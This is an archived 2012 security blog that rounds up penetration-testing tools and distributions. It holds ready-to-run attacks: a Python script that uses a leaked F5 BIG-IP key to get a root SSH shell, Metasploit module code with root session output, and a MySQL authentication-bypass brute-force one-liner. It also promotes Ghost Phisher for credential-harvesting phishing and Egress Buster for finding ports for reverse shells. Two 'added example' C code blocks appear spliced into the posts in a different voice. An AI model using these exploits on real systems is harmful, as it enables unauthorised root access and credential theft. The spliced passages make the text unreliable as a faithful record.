Friday, November 16, 2012

Hack.me – Build, Host & Share Vulnerable Web Application Code

Hack.me is a FREE, community-based project powered by eLearnSecurity. The community allows you to build, host and share vulnerable web application code for educational and research purposes.
It aims to be the largest collection of “runnable” vulnerable web applications, code samples and CMS’s online. The platform is available without any restriction to any party interested in Web Application Security: students, universities, researchers, penetration testers and web developers.


Features
  • Upload your own code
  • Online IDE for PHP & MySQL
  • Your code hosted in the cloud
  • FREE!!
  • Practice webapp security
  • Isolated environment
  • Online: nothing to download!
Safety
Every time you run a new Hackme, the site will initiate a new sandbox for you. You get isolated access to it, so you always know that the application is safe for you to use. No other students can add malware or exploits to your sandbox. This ensures 99% safety.
What about the 1%? While the team makes its best effort to moderate each and every new web app uploaded to Hack.me, chances are that something can and will slip through. If you are not 100% comfortable trusting us or the Hackme developer, please just run new Hackmes from a virtual machine or from a non-production OS.
We have written about a variety of web apps where you can practice your hack-fu such as:
You can try and feel it; up to you to decide the best:
https://hack.me/ 

Happy Hunting

Thursday, October 25, 2012

BackBox Linux 3.0 - penetration testing and forensic analysis tasks

Raffaele Forte has announced the release of BackBox Linux 3.0, a specialist Ubuntu-based live DVD designed for penetration testing and forensic analysis tasks: "The BackBox team is pleased to announce the major release of BackBox Linux, version 3.0. The major release includes features such as Linux kernel 3.2 and Xfce 4.8. Apart from the system major upgrade, all auditing tools are up to date as well. What's new: system upgrade; bug corrections; performance boost; improved start menu; improved Wi-Fi drivers (compat-wireless aircrack patched); new and updated hacking tools. System requirements: 32-bit or 64-bit processor; 512 MB of system memory; 4.4 GB of disk space for installation; graphics card capable of 800x600 pixel resolution; DVD-ROM drive or USB port." Here is the brief release announcement.
You can download it here:-

Download: backbox-3.0-i386.iso (1,099MB, MD5)
          backbox-3.0-amd64.iso (1,100MB, MD5).


 

For more pictures, click here: http://www.backbox.org/gallery/backbox-linux-2

Sunday, September 30, 2012

CrowdRE – Crowdsourced Reverse Engineering Service From CrowdStrike

Reversing complex software quickly is challenging due to the lack of professional tools that support collaborative analysis. The CrowdRE project aims to fill this gap. Rather than using a live distribution of changes to all clients, which has proven to fail in the past, it leverages the architecture that is used with success to organize source code repositories: a system that manages a history of changesets as commit messages.

There’s a great video here, which explains more about CrowdRE and how to get started:



The central component is a cloud-based server that keeps track of commits in a database. Each commit covers one or more functions of an analyzed binary and contains information like annotations, comments, prototype, struct and enum definitions and the like. Clients can search the database for commits of functions by constructing a query from the analyzed binary’s hash and the function offset. Different concurring commits for a function are possible; in such cases it is up to the user to decide which commit is better.
This basic concept is sufficient for a collaborative workflow on a per-function basis for a shared binary. One exciting feature is a similarity hashing scheme that considers the basic block boundaries of a function. Each function is mapped to a similarity-preserving hash of fixed size. A database query for such a function’s similarity hash returns a set of functions sorted by their similarity value, and the analyst can choose amongst them. This is extremely helpful when analyzing variants based on the same code or generations of a malware family, for example.
The CrowdRE client is now freely available as an IDA Pro plugin. CrowdStrike maintains a central cloud for the community to share their commits amongst each other. It is our goal to help build a public database of known, well annotated functions to speed up the analysis of standard components, somewhat similar to what BinCrowd (which is offline nowadays) offered but with support for multiple co-existing commits for the same function. We also support list-based commit visibility to give users control over who else can see and import their contributions.
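The per-function similarity search described above, as an added C example that is not CrowdRE's code: it sketches a function's basic-block boundaries into a fixed 256-bit vector and ranks a small constructed "database" of functions by Jaccard similarity, so a patched generation of the same routine ranks above an unrelated function. The sketch scheme, the function names and the sample block lengths are all constructed for illustration, not CrowdRE's actual algorithm or data.

```c
/* Added example (not CrowdRE's code): a fixed-size, similarity-preserving
 * sketch of a function built from its basic-block boundaries, plus a ranked
 * query over a tiny constructed "database". The scheme is illustrative only. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define SKETCH_WORDS 4          /* 4 x 64 bits = 256-bit fixed-size sketch */

typedef struct { uint64_t bits[SKETCH_WORDS]; } sketch_t;

typedef struct {
    const char *name;           /* label for printing only */
    uint64_t offset;            /* function offset inside its binary */
    size_t nblocks;
    const uint32_t *block_len;  /* byte length of each basic block, address order */
} function_t;

/* splitmix64 finaliser: spreads one feature token over 64 bits. */
static uint64_t mix64(uint64_t x) {
    x += 0x9e3779b97f4a7c15ULL;
    x = (x ^ (x >> 30)) * 0xbf58476d1ce4e5b9ULL;
    x = (x ^ (x >> 27)) * 0x94d049bb133111ebULL;
    return x ^ (x >> 31);
}

/* One feature per basic block: its length paired with the next block's length,
 * so the sequence of boundaries matters, not just the multiset of sizes.
 * Each feature sets one bit of the sketch (Bloom-filter style). */
static void sketch_function(const function_t *f, sketch_t *out) {
    memset(out, 0, sizeof *out);
    for (size_t i = 0; i < f->nblocks; i++) {
        uint64_t next = (i + 1 < f->nblocks) ? f->block_len[i + 1] : 0;
        uint64_t token = ((uint64_t)f->block_len[i] << 32) | next;
        unsigned bit = (unsigned)(mix64(token) % (64 * SKETCH_WORDS));
        out->bits[bit / 64] |= 1ULL << (bit % 64);
    }
}

static unsigned popcount64(uint64_t v) { unsigned c = 0; for (; v; v &= v - 1) c++; return c; }

/* Jaccard similarity of two sketches, |A & B| / |A | B|, in [0, 1]. */
static double sketch_similarity(const sketch_t *a, const sketch_t *b) {
    unsigned inter = 0, uni = 0;
    for (int i = 0; i < SKETCH_WORDS; i++) {
        inter += popcount64(a->bits[i] & b->bits[i]);
        uni   += popcount64(a->bits[i] | b->bits[i]);
    }
    return uni ? (double)inter / uni : 1.0;
}

/* Query: score every function in funcs[] against query and fill order[] with
 * their indices, most similar first. score[i] stays indexed by i. */
static void rank_by_similarity(const function_t *query, const function_t *funcs,
                               size_t n, size_t *order, double *score) {
    sketch_t q, s;
    sketch_function(query, &q);
    for (size_t i = 0; i < n; i++) {
        sketch_function(&funcs[i], &s);
        score[i] = sketch_similarity(&q, &s);
        order[i] = i;
    }
    for (size_t i = 1; i < n; i++)              /* insertion sort, descending */
        for (size_t j = i; j > 0 && score[order[j - 1]] < score[order[j]]; j--) {
            size_t t = order[j - 1]; order[j - 1] = order[j]; order[j] = t;
        }
}

/* Constructed sample: one routine in two generations of a malware family (the
 * third basic block grew from 8 to 11 bytes) and one unrelated function. */
static const uint32_t gen1_blocks[]  = { 12, 40, 8, 25, 31, 6 };
static const uint32_t gen2_blocks[]  = { 12, 40, 11, 25, 31, 6 };
static const uint32_t other_blocks[] = { 100, 3, 77, 19 };

static const function_t query_fn = { "decrypt_config_gen1", 0x1c80, 6, gen1_blocks };
static const function_t db[] = {
    { "unrelated_fn",        0x1000, 4, other_blocks },
    { "decrypt_config_gen2", 0x2400, 6, gen2_blocks },
};
#define DB_SIZE (sizeof db / sizeof db[0])

/* Index in db[] of the best match for query_fn (expected: 1, the gen2 variant). */
static size_t demo_top_match(void) {
    size_t order[DB_SIZE]; double score[DB_SIZE];
    rank_by_similarity(&query_fn, db, DB_SIZE, order, score);
    return order[0];
}

/* Similarity score of query_fn against db[idx]. */
static double demo_similarity(size_t idx) {
    size_t order[DB_SIZE]; double score[DB_SIZE];
    rank_by_similarity(&query_fn, db, DB_SIZE, order, score);
    return score[idx];
}
```

Four of the six boundary features are shared between the two generations, so their similarity lands near 0.5, while the unrelated function scores near 0 unless two tokens happen to collide in the 256-bit sketch.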

You can check out the service here:
https://crowdre.crowdstrike.com/sign-in

Tuesday, September 4, 2012

Upgrade From BackTrack 5 R2 to BackTrack 5 R3

This is a simple way to upgrade from BackTrack 5 R2 to BackTrack 5 R3:-

Open your terminal and type the command:

1. apt-get update && apt-get dist-upgrade

With the dist-upgrade finished, all that remains is to install the new tools that have been added for R3. An important point to keep in mind is that there are slight differences between the 32-bit and 64-bit tools, so make sure you choose the right one.

2.
32-bit install tools

apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r artemisa rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack uberharvest acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler

64-bit install tools

apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter multiforcer bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler

That’s all there is to it! Once the new tools have been installed, you are up and running with BackTrack 5 R3. As always, if you come across any bugs or issues, please submit tickets via the BackTrack Redmine Tracker.

ok folks Happy hunting!!!

BackTrack 5 R3 adds tools for Arduino and Teensy attacks

The third release of version 5 of the BackTrack Linux security distribution fixes several bugs discovered since the R2 release in March and adds over 60 new tools. Several of the new tools were released as part of presentations at the recent Black Hat and DEFCON conferences. The distribution has also added a completely new category of software for "physical exploitation". This category includes libraries and an IDE for the Arduino and the Kautilya toolkit which provides payloads for the Teensy USB development board.
BackTrack can be run as a live CD for added security and flexibility or can be permanently installed on a system. The distribution is developed with security researchers and penetration testers in mind and offers one of the most comprehensive collections of Linux-based security software. Development of the distribution is sponsored by Offensive Security.
BackTrack 5 R3 is available with a choice of KDE and GNOME desktops for 32- and 64-bit machines and the project also provides a pre-built VMware image. ISO images can be downloaded directly from the distribution's mirrors or via BitTorrent. Information on how to install and use BackTrack is available from the project's wiki.

Thanks to H-Security for the news

BackTrack 5 R3 - Release

Hello there!! Sorry for the long time without updating any new material on this blog. Maybe it's not too late to tell the good news to all BackTrack lovers that the team has released the new BackTrack 5 R3 and it is ready to try. OK, this is the story:-
------------------------------------------------------------------------------------------------------------


The time has come to refresh our security tool arsenal – BackTrack 5 R3 has been released. R3 focuses on bug-fixes as well as the addition of over 60 new tools – several of which were released in BlackHat and Defcon 2012. A whole new tool category was populated – “Physical Exploitation”, which now includes tools such as the Arduino IDE and libraries, as well as the Kautilya Teensy payload collection.
Building, testing and releasing a new BackTrack revision is never an easy task. Keeping up-to-date with all the latest tools, while balancing their requirements of dependencies, is akin to a magic show juggling act. Thankfully, active members of our redmine community such as backtracklover and JudasIscariot make our task that much easier by actively reporting bugs and suggesting new tools on a regular basis. Hats off to the both of you.

We would like to thank Offensive Security for providing the BackTrack dev team with the funding and resources to make all of this happen. Also, a very special thanks to dookie, our lead developer – for building, testing and packaging most of the new tools in this release.
Together with our usual KDE and GNOME, 32/64 bit ISOs, we have released a single VMware Image (Gnome, 32 bit). For those requiring other VM flavors of BackTrack – building your own VMWare image is easy – instructions can be found in the BackTrack Wiki.
Lastly, if you’re looking for intensive, real world, hands on Penetration Testing Training – make sure to drop by Offensive Security Training, and learn the meaning of “TRY HARDER”.
For the insanely impatient, you can download the BackTrack 5 R3 release via torrent right now. Direct ISO downloads will be available once all our HTTP mirrors have synched, which should take a couple more hours. Once this happens, we will update our BackTrack Download page with all links.

Saturday, July 14, 2012

Microsoft® EMET third-party GUI

Around this time last year I was working on a contract implementing a service running on a Microsoft® Embedded XP device that required a high level of security. Unfortunately I knew that Embedded XP did not have the SEHOP and ASLR protections of modern operating systems such as Windows® Vista and Microsoft Windows® 7. Because my service was communicating over the WAN it could potentially be vulnerable to zero-day exploits.

The Problem

    I really wanted to use the Enhanced Mitigation Experience Toolkit for providing SEHOP and pseudo-ASLR but unfortunately the EMET graphical interface was implemented with the .NET Framework. This imposed several problems; I had very limited drive space to work with... the operating system was installed on a 512 megabyte Secure Digital (SD) card. The operating system and other various tools consumed most of this space. Also because the device was designated as High-Security I did not want to increase the attack surface by installing the .NET framework. There have been many vulnerabilities found within the .NET framework over the last few years.

The Solution

    I began developing a custom graphical interface for the EMET package. But first there were a few hurdles I would need to overcome. The first problem I encountered was the archaic Application Compatibility Database engine that was being used. I began reverse engineering this beast and it appears to be similar to the old hash-bucket databases we used back in the old Unix days. Somewhat similar to the old ndbm, dbm and gdbm. The problem was that the AppHelp.dll that is distributed with Microsoft Windows® XP is missing many of the functions for creating and writing to the Application Compatibility Database.
    There were a few other issues such as figuring out how the mostly-undocumented Boot Configuration Data (BCD) store is implemented. On operating systems prior to Vista I could simply change a few registry keys and modify the boot.ini but to make my software future proof I would need to support the BCD. 


  I recently added the ability to install and configure EMET on ComputerA and export all of the settings and package all of the binaries into a redistributable package ready for installation on ComputerB. I also wanted to expose more of the EMET internals to the end-user such as heap pre-allocations.

Final Thoughts

    If you are interested in using the third-party graphical interface for the Enhanced Mitigation Experience Toolkit you may download it here.
Download: Native EMET graphical interface

MD5: B8FB870B831954EC6FB6580F72E4AF83
SHA1: 806E50C3A7BF38363E045BD1B5CA42351D40DB3B

    During my research I encountered some absolutely astonishing security issues related to the App Compat engine. I want to make a public call to other security researchers to focus some attention on this area.

Thanks to David Delaune at www.scatternetwork.com

Tuesday, July 10, 2012

The Mole v0.3 – Automatic SQL Injection Exploitation Tool



The Mole is an automatic SQL Injection exploitation tool. By providing only a vulnerable URL and a valid string on the site, it can detect the injection and exploit it, either by using the union technique or a boolean query based technique.

Features

  • Support for injections using Mysql, SQL Server, Postgres and Oracle databases.
  • Command line interface. Different commands trigger different actions.
  • Auto-completion for commands, command arguments and database, table and columns names.
  • Support for filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
  • Exploits SQL Injections through GET/POST/Cookie parameters.
  • Developed in python 3.
  • Exploits SQL Injections that return binary data.
  • Powerful command interpreter to simplify its usage.
Disclaimer: Usage of The Mole for attacking web servers without mutual consent can be considered as an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program.

Download this tool here: Linux - Themole-0.3-lin-src.tar.gz
                         Windows - Themole-0.3-win32.zip
For more info go here.

Thursday, June 28, 2012

“Egress Buster” – Find outbound ports

A friend was recently on a penetration test and needed a port on the outside. I haven’t found any decent tools out there for finding what ports are allowed outbound to help with reverse shells and stuff like that, so I wrote one real quick. Note that this was written in about 15 minutes and the code can absolutely be improved. I’ll probably go back and clean it up sometime. There are some limitations; for one, operating systems in general start to puke when you generate over 1000 listeners, so you will need to test 1000 at a time. Good news is the socket handlers are multi-threaded, so you can cycle through about 1000 ports in well under a minute. Here’s the general concept:
You are on the inside network somehow and need to find what ports are allowed out to the Internet. There are two main files/components – egressbuster and egress_listener. Egressbuster connects out on whatever ports you specify and tries to connect to an Internet-facing computer that’s running egress_listener.
Very simple to run:
On victim:

egressbuster.exe  
example: egressbuster.exe 208.1.1.1 1-1000



In the above example, we specify a low port range and high port range, egressbuster will attempt to connect from port 1 to 1000 outbound to wherever the reverse_listener is.
The listener:

python egress_listener.py 
example: python egress_listener.py 1-1000


In the above example, we just specify what ranges we need to listen to. In the above example we listen from 1 to 1000 for incoming connections. When a connection is established, this is what you'll see on the listener side.

192.168.235.131 connected on port: 170
192.168.235.131 connected on port: 171
192.168.235.131 connected on port: 172
192.168.235.131 connected on port: 173
192.168.235.131 connected on port: 174
192.168.235.131 connected on port: 175
192.168.235.131 connected on port: 176
192.168.235.131 connected on port: 177
192.168.235.131 connected on port: 178

If you’re interested, download the byte compiled code and the python source here.

Press F5 for root shell

As HD mentioned, F5 has been inadvertently shipping a static ssh key that can be used to authenticate as root on many of their BigIP devices. Shortly after the advisory, an anonymous contributor hooked us up with the private key.

Getting down to business, here it is in action:

    18:42:35 0 exploit(f5_bigip_known_privkey) > exploit

    [+] Successful login
    [*] Found shell.
    [*] Command shell session 3 opened ([redacted]:52979 -> [redacted]:22) at 2012-06-22 18:42:43 -0600

    id; uname -a
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
    Linux [redacted] 2.4.21-10.0.1402.0smp #2 SMP Mon Feb 15 10:23:56 PST 2010 i686 athlon i386 GNU/Linux
    ^Z
    Background session 3? [y/N]  y

    18:42:35 1 exploit(f5_bigip_known_privkey) >

Of course, since it's just a regular ssh key, you can easily just drop it in a file and use a standard ssh client.

    ssh -i ~/.ssh/f5-bigip.priv root@8.8.8.8

The advantage of using Metasploit to exploit this weakness is in the session management and rapid post-exploitation capabilities that the framework offers.
This bug is also interesting in that it gave us a good test case for using static SSH credentials as an exploit module rather than auxiliary. The key difference between exploit and auxiliary modules is usually the need for a payload. If it needs a payload: exploit. Otherwise, it's auxiliary. In this case it's a little blurry, though, because it results in a session, which is typically an exploit trait. Some of our authentication bruteforce scanners get around this with some ruby acrobatics so they can still create a session despite not having a payload or a handler.

From a module developer perspective, this exploit has a few interesting aspects that you won't see elsewhere.
First, and probably most important, it doesn't upload a payload to the victim. The connection itself becomes a shell, so it doesn't need to, but that presents a bit of a problem with the framework's design. Fortunately there is a payload for exactly this situation: cmd/unix/interact. This simple payload is different from most; all it does is shunt commands from the user straight to the socket and back. It uses a "find" handler similar to the way a findsock payload works. To tell the framework about the payload and handler this exploit will require, we need a block in the module info like so:

    'Payload'     => {
      'Compat'  => {
        'PayloadType'    => 'cmd_interact',
        'ConnectionType' => 'find',
      },
    },

Since there is really only one payload that works with this exploit, it also makes sense to set it by default:

    'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },

Next, it uses our modified Net::SSH library to connect to the victim. Most exploits will include Msf::Exploit::Remote::Tcp or one of its descendants; those related mixins all set up the options everyone is familiar with: RHOST, RPORT, etc. Since this one does not, we have to do it manually like so:

    register_options(
      [
        # Since we don't include Tcp, we have to register this manually
        Opt::RHOST(),
        Opt::RPORT(22),
      ], self.class
    )

Lastly, because the handler is of type "find" we must call handler() to get a session. Most Remote::Tcp exploits don't have to do this if they are not compatible with "find" because the handler will spawn a session whenever a connection is made (either reverse or bind). However, all exploits that *are* compatible with "find" payloads must call handler() at some point. Normally there is a global socket created by the Tcp mixin when you call connect() but in this case it is necessary to let the handler know our socket is now a shell.

    def exploit
      conn = do_login("root")
      if conn
        print_good "Successful login"
        handler(conn.lsock)
      end
    end

This was a fun module to write. The devices it targets can be a goldmine for a pentester who likes packets since they're basically a giant packet sink that lets you read and modify traffic willy nilly. ARP spoofing is noisy and DNS poisoning is hard, let's just own the firewall.

Thursday, June 14, 2012

Stuxnet Review

Just for info, maybe it's old news, but Stuxnet still threatens all PCs in the world, especially in industry.

Wednesday, June 13, 2012

Remote Root Authentication Bypass for F5 BIG-IP

Here’s a quick script written with the private key to bypass the root authentication login for F5’s Big-IP SSH login. Scan for a Big-IP and run this against it and you have root!


Just copy the below code into a .py file, and run python .py. Enter the IP address and you're done.

 CODE:


#!/usr/bin/python
#
# Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py)
#
# Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass
# http://www.secmaniac.com
#
#
import subprocess,os

filewrite = file("priv.key", "w")
filewrite.write("""-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----""")
filewrite.close()

ipaddr=raw_input("Enter the IP address of the F5: ")
subprocess.Popen("ssh -i priv.key root@%s" % (ipaddr), shell=True).wait()

if os.path.isfile("priv.key"):
    os.remove("priv.key")

You are done.

TQ rel1k from SEC-MANIAC

Happy Hunting!!

12 June 2012

MySQL 1 Liner Hack Gives Root Access Without Password

The latest news that has hit the streets is the occurrence of the easiest hack ever: if you have local shell access (any user privilege level) and you can connect to MySQL – you can get root access to MySQL within a few seconds.
I tried this yesterday on one of my servers on Ubuntu 12.04 running the latest version of MySQL in the repo…and it worked in about 30 seconds. Scary really, you can use this single line of bash to hack MySQL:

while [ 1 ];do mysql -u root --password=123; done

Or the Python version I originally saw:

#!/usr/bin/python
import subprocess

while 1:
        subprocess.Popen("mysql -u root mysql --password=blah", shell=True).wait()


" Security experts have identified some 879,046 servers vulnerable to a brute force flaw that undermines password controls in MySQL and MariaDB systems.
According to Rapid7 security chief HD Moore, one in every 256 brute force attempts could override authentication controls on the servers and allow any password combination to be accepted. An attacker only needed to know a legitimate username which in most circumstances included the name ‘root’.
The flaw has already been exploited. Moore reported that the flaw (CVE-2012-2122) was already patched for both MySQL and MariaDB, but many MySQL administrators had not fixed the hole in their deployments.
Upon scanning 1.7 million publicly exposed MySQL servers, he found more than half (879,046) vulnerable to the “tragically comedic” flaw."
 
There’s a lot of vulnerable servers out there, so you better hope they aren’t yours because it’s not hard to scan whole subnets for servers with port 3306 open that accept connections from the outside world.
And if your server is in that state – it’s vulnerable. I just checked the repos for Ubuntu 10.04 LTS and Ubuntu 12.04 LTS and they both have a patched version of MySQL available for download so I suggest you get on your servers and do -

aptitude update; aptitude safe-upgrade

if you are using a shitty OS that uses yum or something – figure it out yourself.


"Affected versions, listed below, require memcmp() to return an arbitrary integer outside of the range -128 to 127. All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5 and 5.5.22 were vulnerable, Golubchik said.
Moore and other security boffins identified vulnerable versions in Ubuntu 64-bit versions 10.04, 10.10, 11.04, 11.10, and 12.04, OpenSUSE 12.1 64-bit MySQL 5.5.23, and Fedora. Official builds of MariaDB and MySQL were safe, along with Red Hat Enterprise Linux 4, 5 and 6 and some flavours of Debian Linux and Gentoo 64 bit.
A list of accessible MySQL servers found 356,000 deployments running versions of 5.0.x, followed by 285,000 running 5.1.x, and 134,436 running 5.5.x. Another list of MySQL build flavours revealed 43,900 running Ubuntu, 6408 on Debian, and 98,665 on Windows."
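The memcmp() narrowing described in the quote above, as an added C demonstration that is not part of the original post or of MySQL's source: wide_memcmp is a constructed stand-in for an optimised libc memcmp that returns word differences, my_bool mirrors MySQL's char typedef, and check_scramble_vuln / check_scramble_fixed show the vulnerable and corrected shapes of the comparison, with a deterministic trial that counts how many random wrong scrambles each one accepts.

```c
/* Added demonstration of the CVE-2012-2122 root cause (constructed for this
 * page, not MySQL's source). check_scramble() returned memcmp()'s int result
 * through my_bool, a char: any result that is a multiple of 256 narrows to 0,
 * which the caller reads as "password matches". */
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define SHA1_HASH_SIZE 20
typedef char my_bool;   /* the same typedef MySQL used for its boolean results */

/* Stand-in for an optimised libc memcmp: compares 32-bit words and returns the
 * difference of the first mismatching word, a value far outside -128..127.
 * Constructed for this demo; real implementations differ, which is why only
 * some builds were affected. */
static int wide_memcmp(const void *pa, const void *pb, size_t n) {
    const unsigned char *a = pa, *b = pb;
    size_t i = 0;
    for (; i + 4 <= n; i += 4) {
        uint32_t wa = (uint32_t)a[i] | (uint32_t)a[i + 1] << 8 |
                      (uint32_t)a[i + 2] << 16 | (uint32_t)a[i + 3] << 24;
        uint32_t wb = (uint32_t)b[i] | (uint32_t)b[i + 1] << 8 |
                      (uint32_t)b[i + 2] << 16 | (uint32_t)b[i + 3] << 24;
        if (wa != wb) return (int32_t)(wa - wb);
    }
    for (; i < n; i++)                      /* tail bytes, if any */
        if (a[i] != b[i]) return (int)a[i] - (int)b[i];
    return 0;
}

/* Vulnerable shape: the int is narrowed to char on return. 0 means "OK". */
static my_bool check_scramble_vuln(const uint8_t *computed, const uint8_t *stored) {
    return wide_memcmp(computed, stored, SHA1_HASH_SIZE);
}

/* Fixed shape: collapse the result to 0 or 1 before it is narrowed. */
static my_bool check_scramble_fixed(const uint8_t *computed, const uint8_t *stored) {
    return wide_memcmp(computed, stored, SHA1_HASH_SIZE) != 0;
}

/* Constructed pair: first byte equal, second byte differs, rest identical.
 * The word difference is -0x1100, whose low byte is 0, so the vulnerable
 * check accepts a wrong password. Returns the check's result (0 = accepted). */
static int demo_pair(int fixed) {
    uint8_t computed[SHA1_HASH_SIZE] = { 0x11, 0x22, 0x33, 0x44 };
    uint8_t stored[SHA1_HASH_SIZE]   = { 0x11, 0x33, 0x33, 0x44 };
    return fixed ? check_scramble_fixed(computed, stored)
                 : check_scramble_vuln(computed, stored);
}

/* xorshift32 so the trial below is deterministic and runs offline. */
static uint32_t rng_state;
static uint8_t next_byte(void) {
    uint32_t x = rng_state;
    x ^= x << 13; x ^= x >> 17; x ^= x << 5;
    rng_state = x;
    return (uint8_t)(x >> 24);
}

/* Simulate `trials` logins with random wrong scrambles against one stored
 * hash; returns how many were accepted. The vulnerable path accepts roughly
 * one in 256 (whenever the first bytes happen to agree), the fixed path none. */
static unsigned count_false_accepts(unsigned trials, int fixed) {
    uint8_t stored[SHA1_HASH_SIZE], guess[SHA1_HASH_SIZE];
    unsigned accepted = 0;
    rng_state = 0x12345678u;               /* fixed seed: reproducible run */
    for (size_t i = 0; i < SHA1_HASH_SIZE; i++) stored[i] = next_byte();
    for (unsigned t = 0; t < trials; t++) {
        for (size_t i = 0; i < SHA1_HASH_SIZE; i++) guess[i] = next_byte();
        my_bool rc = fixed ? check_scramble_fixed(guess, stored)
                           : check_scramble_vuln(guess, stored);
        if (rc == 0) accepted++;
    }
    return accepted;
}
```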

Honestly I find that this is a really serious vulnerability, but has a pretty low risk profile. It will only work in cases of badly configured MySQL users where they accept connections from any IP address – user@% type entries in the user table.
NO ONE should be running root@% – so that would mean the attacker would need local shell access. And well if they have that, it’s pretty much game over anyway.

This vulnerability is notated as CVE-2012-2122.
Source: SC Magazine

TQ darknet.org.uk for this info

Tuesday, June 5, 2012

Ghost Phisher GUI suite for phishing and penetration attacks

Ghost Phisher is a computer security application that comes inbuilt with a Fake DNS Server, Fake DHCP Server and Fake HTTP server, and also has an integrated area for automatic capture and logging of HTTP form method credentials to a database. The program could be used as a honeypot, to service DHCP requests or DNS requests, or for phishing attacks.

Ghost Phisher

New Version 1.4 

Ghost Phisher 1.4 includes the following new features
1. Inbuilt High speed RFC 2131 compliant DHCP Server
Requirements:
 
python
python-qt4
xterm
subversion
metasploit


To install, simply run the following command in a terminal after changing directory to the path where the downloaded package is:

root@host:~# dpkg -i ghost-phisher_1.3_all.deb
 
Icons and Running the application:
 
The software icon can be found in the application menu of the GNOME desktop interface.
The icon can also be found at /usr/share/applications for KDE and also GNOME:
There you find "Ghost Phisher.desktop"

In BackTrack 5 R2 run it from /opt/Ghost-Phisher/ and start.

To get the source code for this project from SVN, here's the checkout link:
 
root@host:~# svn checkout http://ghost-phisher.googlecode.com/svn/Ghost-Phisher
 
Ghost Phisher Penetration Screenshots
 
Ghost Phisher ships with default Windows and Linux vulnerability pages. These pages can be used for penetration. Ghost automatically recognizes the remote operating system and displays the vulnerability pages according to the information fetched.



Payload Download

This screenshot displays a Windows machine penetrated upon payload execution using Metasploit


After the remote machines are exploited, Ghost automatically redirects the clients to the internet with the help of the alternate DNS settings and inbuilt cookie system.

Some More Screenshots:
You could Emulate WIFI access points for client redirections


Here shows client connected to fake access point


Heres the Fake-DNS tab; Notice the Fake-IP address specified


Here shows the victim supplied a fake lease by the DHCP


Here shows the victim gettings the fake resolved IP address:


Here shows our HTTP server, with a downloaded webpage intended to be faked:


Since our victim has our fake DHCP server address,therefore he gets directed to our fake http server:


Here shows our database area, which automatically captures and logs forms credentials


Check out his other project:
http://code.google.com/p/fern-wifi-cracker/
 
http://code.google.com/p/hexorbase/
Regards:
Saviour Emmanuel Ekiko

Saturday, June 2, 2012

Metasploit on iPhone 4S and iPad 2

With the recent Absinthe Jailbreak which opens up firmware 5.1.1 to Cydia, we once again tried to get Metasploit running on these iBabies. After a bit of fiddling around with various ruby package versions, it seems like the following combination works well with the latest version of Metasploit 4.4.0-dev (as of May 2012).
Of course, you need a jailbroken iPhone or iPad, with apt, an OpenSSH server and an SSH client, such as iSSH. Once you are SSH’ed into your iPhone / iPad, run the following commands:

# Install basic tools
apt-get update
apt-get dist-upgrade
apt-get install wget subversion

# Download correct version of ruby and dependencies
wget http://ininjas.com/repo/debs/ruby_1.9.2-p180-1-1_iphoneos-arm.deb
wget http://ininjas.com/repo/debs/iconv_1.14-1_iphoneos-arm.deb
wget http://ininjas.com/repo/debs/zlib_1.2.3-1_iphoneos-arm.deb

# Install them
dpkg -i iconv_1.14-1_iphoneos-arm.deb
dpkg -i zlib_1.2.3-1_iphoneos-arm.deb
dpkg -i ruby_1.9.2-p180-1-1_iphoneos-arm.deb

# Delete them
rm -rf *.deb

# Go into /private/var and svn checkout the msf trunk.
# Don't download the MSF tar.gz due to svn client versioning issues

cd /private/var
svn co https://www.metasploit.com/svn/framework3/trunk/ msf3
cd msf3/

# Check that Metasploit is running
ruby msfconsole
As no blog post is complete without a reverse shell screenshot, here’s a popped shell from the iPhone:


Info from Offensive-Security.com

Friday, May 25, 2012

Wifite + Reaver WPA/WPA2 crack in BackTrack 5 R2

wifite

An automated wireless attack tool.

What's New?

The biggest change from version 1 is support for "reaver", a Wifi-Protected Setup (WPS) attack tool. Reaver can compromise the PIN and PSK for many routers that have WPS enabled, usually within hours.
Other changes include a complete code re-write with bug fixes and added stability. Due to problems with the Python Tkinter suite, the GUI has been left out of this latest version.

About

Wifite is for Linux only.
Wifite was designed for use with pentesting distributions of Linux, such as Backtrack 5 R1, BlackBuntu, BackBox; any Linux distributions with wireless drivers patched for injection. The script appears to also operate with Ubuntu 11/10, Debian 6, and Fedora 16.
Wifite must be run as root. This is required by the suite of programs it uses. Running downloaded scripts as root is a bad idea. I recommend using the Backtrack 5 R1 bootable Live CD, a bootable USB stick (for persistent), or a virtual machine. Note that Virtual Machines cannot directly access hardware so a wireless USB dongle would be required.
Wifite assumes that you have a wireless card and the appropriate drivers that are patched for injection and promiscuous/monitor mode.

Execution

